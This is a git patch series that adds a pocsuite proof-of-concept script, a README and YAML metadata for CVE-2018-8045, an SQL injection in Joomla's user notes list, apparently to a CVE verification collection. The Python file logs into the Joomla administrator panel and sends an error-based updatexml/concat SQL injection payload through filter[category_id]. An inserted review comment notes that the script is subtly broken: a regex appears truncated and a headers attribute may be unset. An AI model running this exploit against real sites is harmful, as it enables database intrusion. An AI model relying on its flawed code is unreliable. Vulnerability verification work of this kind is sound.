From 693a893fd39087ddb095be70eca44057f00ecd2e Mon Sep 17 00:00:00 2001 From: strawball Date: Thu, 27 Apr 2023 13:13:48 +0000 Subject: [PATCH 1/3] CWE-2018-8045 Signed-off-by: strawball --- cve/joomla/2018/CVE-2018-8045/README.md | 2 + .../CVE-2018-8045/joomla_user_notes_sqli.py | 70 +++++++++++++++++++ cve/joomla/2018/yaml/CVE-2018-8045.yaml | 22 ++++++ 3 files changed, 94 insertions(+) create mode 100644 cve/joomla/2018/CVE-2018-8045/README.md create mode 100644 cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py create mode 100644 cve/joomla/2018/yaml/CVE-2018-8045.yaml
diff --git a/cve/joomla/2018/CVE-2018-8045/README.md b/cve/joomla/2018/CVE-2018-8045/README.md
new file mode 100644
index 00000000..25e3cf94
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/README.md
@@ -0,0 +1,2 @@
+# CVE-2018-8045
+Joomla内核SQL注入漏洞原理及poc
\ No newline at end of file
diff --git a/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
new file mode 100644
index 00000000..e7ae600d
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import re
+import hashlib
+from pocsuite.api.request import req
+from pocsuite.api.poc import register
+from pocsuite.lib.core.data import logger
+from pocsuite.api.poc import Output, POCBase
+from pocsuite.api.utils import randomStr
+from pocsuite.lib.core.enums import CUSTOM_LOGGING
+from urlparse import urljoin
+
+
+class TestPOC(POCBase):
+ vulID = ''
+ version = ''
+ author = 'luckybool1020'
+
+ def get_pass(self, joomla_session):
+ if any(para not in self.params for para in ['user', 'passwd']):
+ logger.log(
+ CUSTOM_LOGGING.SYSINFO,
+ "You can use --extra-params=\"{'user': 'xxx','passwd': 'xxx'}\" to exec command")
+ return self.parse_output(None)
+ else:
+ user, passwd = self.params['user'], self.params['passwd']
+ url = urljoin(self.url, '/administrator/index.php')
+ content = joomla_session.get(url).content
+ re_para = '.*'
+ match = re.findall(re_para, content, re.S)
+ if match:
+ value, token = match[0][0], match[0][1]
+ else:
+ return self.parse_output(None)
+ self.headers = {
+ "Content-Type": "application/x-www-form-urlencoded"
+ }
+ pass_payload = 'username={user}&passwd={passwd}&option=com_login&task=login&return={value}&{token}=1'.format(
+ user=user, passwd=passwd, value=value, token=token)
+ joomla_session.post(
+ url=url, params=None, headers=self.headers, data=pass_payload)
+
+ def _verify(self):
+ '''verify mode'''
+ result = {}
+ joomla_session = req.session()
+ self.get_pass(joomla_session)
+ rand_str = randomStr(10, "0123456789")
+ url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
+ sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
+ randstr=rand_str)
+ r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
+ if r.status_code == 500 and hashlib.md5(rand_str).hexdigest()[
+ 0:31] in r.content:
+ 
result['VerifyInfo'] = {}
+ result['VerifyInfo']['URL'] = url
+ return self.parse_output(result)
+
+ _attack = _verify
+
+ def parse_output(self, result):
+ output = Output(self)
+ if result:
+ output.success(result)
+ else:
+ output.fail('Internet nothing returned')
+ return output
+
+
+register(TestPOC)
\ No newline at end of file
diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
new file mode 100644
index 00000000..8b44cfd0
--- /dev/null
+++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
@@ -0,0 +1,22 @@
+id: CVE-2018-8045
+source:
+ https://github.com/luckybool1020/CVE-2018-8045
+info:
+ name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。
+ severity: high
+ description:
+ 在 Joomla!从3.5.0到3.8.5,SQL 语句中缺少变量类型转换导致用户注释列表视图中存在 SQL 注入漏洞。
+ scope-of-influence:
+ Joomla! 3.5.0 through 3.8.5
+ reference:
+ - https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html
+ - https://nvd.nist.gov/vuln/detail/cve-2018-8045
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2018-8045
+ cwe-id: CWE-89
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - SQL注入
\ No newline at end of file
-- Gitee From 5c495747ee0ff617e5fa49e24872992f1efc1637 Mon Sep 17 00:00:00 2001 From: strawball Date: Thu, 27 Apr 2023 13:14:45 +0000 Subject: [PATCH 2/3] CWE-2018-8045 Signed-off-by: strawball --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+)
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9fdf2623..d6a5609b 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -149,6 +149,7 @@ cve:
 - CVE-2016-2107
 joomla:
 - CVE-2023-23752
+ - CVE-2018-8045
 libxml2:
 - CVE-2020-24977
 - CVE-2021-3517
-- Gitee From 5423244fb620568dfab6614939b092831090792c Mon Sep 17 00:00:00 2001 
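Review bot: `self.headers` is read in `_verify` (`joomla_session.post(url=url, headers=self.headers, data=sqli_payload)`) but is only assigned inside `get_pass` on the branch where the login-form match succeeds; when `user`/`passwd` are absent from `self.params` or `re.findall` returns nothing, `get_pass` returns early and the later attribute access raises AttributeError unless `POCBase` supplies a default that is not visible here. Initialising it before the call, `self.headers = {"Content-Type": "application/x-www-form-urlencoded"}` at the top of `_verify`, makes the verify path independent of the login outcome. Also, as committed the pattern `re_para = '.*'` has no capture groups, so `re.findall` yields whole-string matches and `match[0][0]`/`match[0][1]` are the first two characters of the response rather than two distinct values; the intended pattern looks truncated (possibly markup stripped in rendering) and should be confirmed against the file. The return value of `get_pass` is discarded by `_verify`, so a failed login is silently folded into the generic `'Internet nothing returned'` failure; logging the reason at that point would make results easier to interpret.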
From: strawball Date: Wed, 10 May 2023 03:18:05 +0000 Subject: [PATCH 3/3] =?UTF-8?q?tags=E4=BF=AE=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: strawball --- cve/joomla/2018/yaml/CVE-2018-8045.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
index 8b44cfd0..b19e536c 100644
--- a/cve/joomla/2018/yaml/CVE-2018-8045.yaml
+++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
@@ -18,5 +18,4 @@ info:
 cwe-id: CWE-89
 cnvd-id: None
 kve-id: None
- tags:
- - SQL注入
\ No newline at end of file
+ tags: SQL注入
\ No newline at end of file
-- Gitee